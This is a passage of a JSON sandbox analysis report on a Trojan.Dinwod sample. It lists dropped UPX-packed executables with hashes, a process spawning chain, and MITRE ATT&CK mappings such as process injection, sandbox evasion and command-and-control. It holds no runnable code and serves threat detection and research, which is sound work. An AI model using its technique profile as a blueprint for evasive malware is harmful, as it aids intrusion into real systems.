"a0cc3ec6a354029b2b674b7c2d23b6f1d0341c985aa5d37e74cffc0ba69cf0cd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "jxtxdv.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ldpdlv.exe", "file_path": "C:\\ldpdlv.exe", "file_size": 342190, "sha256": "dc248ffbb113e3c3665155be5ed5eb64e0e104fea68c6eecbfc4a64af865998f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ldpdlv.exe (PID: 3012)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lrnlbrl.exe", "file_path": "C:\\lrnlbrl.exe", "file_size": 342368, "sha256": "bc23acf0b04e478ca599b71ce3fc8d2f690b5a01e784c89f09e47e457a44ec5f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lrnlbrl.exe (PID: 4028)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nrdvp.exe", "file_path": "C:\\nrdvp.exe", "file_size": 341490, "sha256": "5378bebde9ec40805c088424be2122f84c9ec5037c4e3d7f4946b8abfe1372e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nrdvp.exe (PID: 5988)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ntjjnl.exe", "file_path": "C:\\ntjjnl.exe", "file_size": 342179, "sha256": "efb75a84aa5af14c7a5a52847e2bde2cf9a4d20085f490eea6199fa671f7060d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trlhh.exe (PID: 1472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nvfdf.exe", "file_path": "C:\\nvfdf.exe", "file_size": 342002, "sha256": "affa436578347ae337581134ef5fdfae8a57abf1b4eaf6614adff8295b51f1f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nvfdf.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdhnvj.exe", "file_path": "C:\\pdhnvj.exe", "file_size": 341963, "sha256": "74b50aa6356eba661a5ae78d21be3a902a2ccf5eedbcb24b99018b2d0e48b991", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pdhnvj.exe (PID: 3460)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdjrtdv.exe", "file_path": "C:\\pdjrtdv.exe", "file_size": 342417, "sha256": "38c0540b045dfa7a9dae31934f7b0f10f6f5808632cfbda98c4b1ceb5c5f34e7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bvffnn.exe (PID: 3912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pfffth.exe", "file_path": "C:\\pfffth.exe", "file_size": 341670, "sha256": "9c0c0628d8488d6188433726f423ce25ecfdb5cfc9c0dbb96d3960305938cbee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pfffth.exe (PID: 2380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ptxnnrh.exe", "file_path": "C:\\ptxnnrh.exe", "file_size": 342270, "sha256": "6828398b9ddef9358a08ac0cb0e8a9d6eda503ce1e03a839ee892738d8638185", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ptxnnrh.exe (PID: 728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rbldl.exe", "file_path": "C:\\rbldl.exe", "file_size": 341545, "sha256": "a3e8be595a02d38821ccc1e1ef7c550fe150124828132e62bd161ec29e5ed3d9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rbldl.exe (PID: 4224)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rnftf.exe", "file_path": "C:\\rnftf.exe", "file_size": 341986, "sha256": "9ece8b56b7ee35f5328a312c19ff7f81cf4205401deebfd2740c401c68b41058", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjxjxxh.exe (PID: 4084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rttxj.exe", "file_path": "C:\\rttxj.exe", "file_size": 342138, "sha256": "38986a435911cb4ef1404b0771413ee07f802f44a72831f6a2eb9f2c45a43ea7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0802042.exe (PID: 904)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjxjxxh.exe", "file_path": "C:\\tjxjxxh.exe", "file_size": 341974, "sha256": "a69ae9362302a77766a86dda654e2d7aefc43a67539e928089b28c06f43cef2c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjxjxxh.exe (PID: 4084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "trdvh.exe", "file_path": "C:\\trdvh.exe", "file_size": 341567, "sha256": "159587b41607b959a06c8268786604254add0958ecfcca86c43366437b504352", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trdvh.exe (PID: 2612)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "trlhh.exe", "file_path": "C:\\trlhh.exe", "file_size": 342163, "sha256": "5d7ae6d994f9be2ca4ff2532b23054fed25a283de439f14a3574738662eed313", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trlhh.exe (PID: 1472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vdfxt.exe", "file_path": "C:\\vdfxt.exe", "file_size": 341582, "sha256": "6f78c23d2c155aee9509cafd955f3385e6fcc63d334e7772bdd8a49d48beef74", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "trdvh.exe (PID: 2612)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vhrdph.exe", "file_path": "C:\\vhrdph.exe", "file_size": 342021, "sha256": "1055c8f430e4b70d61cb933492c3c052d119e71e89e36870b8a323f75598daa2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nvfdf.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vnjvhvr.exe", "file_path": "C:\\vnjvhvr.exe", "file_size": 341690, "sha256": "f8d569ddafdb1339162fc65c6f7d0ccec1c9b5a6fa97be0cbd92f8843fe35d63", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pfffth.exe (PID: 2380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vvtbdn.exe", "file_path": "C:\\vvtbdn.exe", "file_size": 342306, "sha256": "459099457634e6d94a3395c0a3d169dad1d4649269c401d51569c002a4680d85", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dbhlfn.exe (PID: 4480)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xlbdxlx.exe", "file_path": "C:\\xlbdxlx.exe", "file_size": 341503, "sha256": "085ba0b22e85bb5c2cddf6d0557de1a8ff4de9f3e3c449faad3f3381c484485d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xlbdxlx.exe (PID: 4308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xlfpx.exe", "file_path": "C:\\xlfpx.exe", "file_size": 341650, "sha256": "9e47a798a1788327c2e7a721a7a3c51065e7a4e4cc5d3834970efa1483185958", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "xlfpx.exe (PID: 2960)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xxfflb.exe", "file_path": "C:\\xxfflb.exe", "file_size": 342258, "sha256": "c97cd2c55bc31cd3c918f3257de125d8b3db2417e76b0547698913bd711a4916", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "44680.exe (PID: 2812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bphvxnd.exe", "file_size": 342568, "sha256": "f4d66ae380be0705467a1dd692ac51c4f1ae07f2c30710e4acaed32ecdc27af2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ndjtrh.exe", "file_size": 342554, "sha256": "bdcc531589ff96aaa3e03a18f2ad6053af2a8d8d7e9af8c2699707c11e7138ca", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lhfrhnr.exe", "file_size": 342543, "sha256": "c13aaa8dd9b7ad5e8f07a31543701b676e4afdd924620f80cb74e41f0fb4713b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "482064.exe", "file_size": 342525, "sha256": "153b8883f03861457bdcc852b2159435febfbfe99a60e394b196d736d9af4ee4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "202048.exe", "file_size": 342507, "sha256": "3f70ac0d1ac8307667144a78712b143f5a9cc5cade8a6890f40470083d091ba1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "48866.exe", "file_size": 342496, "sha256": "74d6ec7b51be7f9af698bad1d7ccbc3d9bba0a563f3f165805bab7a4f6285017", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hrffr.exe", "file_size": 342478, "sha256": "5c30d344bae370c0974d724fedb3762d44778837b315898275e266a81ba9d862", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nfbjp.exe", "file_size": 342461, "sha256": "db3e3d388df349c1dd5541586539a9b30051dde828394edc22edf8c80eeace43", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6064442.exe", "file_size": 342448, "sha256": "44bdd531cd4a042ba60d04cccf5f804af64d5fbbe1bc60ffb661f9d158fa2276", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "44424.exe", "file_size": 342433, "sha256": "2b2693dd7af3648c22ddf86f59406a7e59382c40eee6c8fab72447c07f2e3257", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005880", "name": "5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe", "normalized_path": "C:\\5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe", "sha256": "5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e", "av_label": "Trojan.Dinwod", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00005876", "parentuid": "00000000-00005880", "name": "bbhhn.exe", "normalized_path": "c:\\bbhhn.exe", "sha256": "500ecd2e1bb82c15eb7a7529df042387a1d40ed28b1aa29185ff64b031ff88ff"}, {"uid": "00000000-00005988", "parentuid": "00000000-00005876", "name": "nrdvp.exe", "normalized_path": "c:\\nrdvp.exe", "sha256": "5378bebde9ec40805c088424be2122f84c9ec5037c4e3d7f4946b8abfe1372e4"}, {"uid": "00000000-00004308", "parentuid": "00000000-00005988", "name": "xlbdxlx.exe", "normalized_path": "c:\\xlbdxlx.exe", "sha256": "085ba0b22e85bb5c2cddf6d0557de1a8ff4de9f3e3c449faad3f3381c484485d"}, {"uid": "00000000-00006088", "parentuid": "00000000-00004308", "name": "68282.exe", "normalized_path": "c:\\68282.exe", "sha256": "ccc5d022304092b708530ac72af5835d0ae88ad3a7ff142b12ea9d47c89e0231"}, {"uid": "00000000-00005996", "parentuid": "00000000-00006088", "name": "62242.exe", "normalized_path": "c:\\62242.exe", "sha256": "d237d056b168a76b02a47204615ed6f2a2f4cd12897f80f8c71a39a291dafa32"}, {"uid": "00000000-00004224", "parentuid": "00000000-00005996", "name": "rbldl.exe", "normalized_path": "c:\\rbldl.exe", "sha256": "a3e8be595a02d38821ccc1e1ef7c550fe150124828132e62bd161ec29e5ed3d9"}, {"uid": "00000000-00006112", "parentuid": "00000000-00004224", "name": "jbdbn.exe", "normalized_path": "c:\\jbdbn.exe", "sha256": "4ec1bd75ab774a61ca5fcf4ec449b6cfac0f9e4c848388f87d09cdf547e5ce90"}, {"uid": "00000000-00002612", "parentuid": "00000000-00006112", "name": "trdvh.exe", "normalized_path": "c:\\trdvh.exe", "sha256": "159587b41607b959a06c8268786604254add0958ecfcca86c43366437b504352"}, {"uid": "00000000-00006120", "parentuid": "00000000-00002612", "name": "vdfxt.exe", "normalized_path": "c:\\vdfxt.exe", "sha256": "6f78c23d2c155aee9509cafd955f3385e6fcc63d334e7772bdd8a49d48beef74"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"bbhhn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"nrdvp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"xlbdxlx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"68282.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"62242.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"rbldl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"jbdbn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"trdvh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"vdfxt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"dnppt.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"btvxfh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"8224062.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"64660.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"xlfpx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"pfffth.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"vnjvhvr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"jpdvr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"jxtxdv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"682244.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"6040442.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"0600220.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"2262446.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"266028.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000\n \"0600240.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76420000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"bbhhn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"bbhhn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bbhhn.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"bbhhn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xlbdxlx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ec0000\n \"xlbdxlx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xlbdxlx.exe\" loaded module \"KERNEL32\" at base 76aa0000\n \"xlbdxlx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xlbdxlx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6abe0000\n \"xlbdxlx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75960000\n 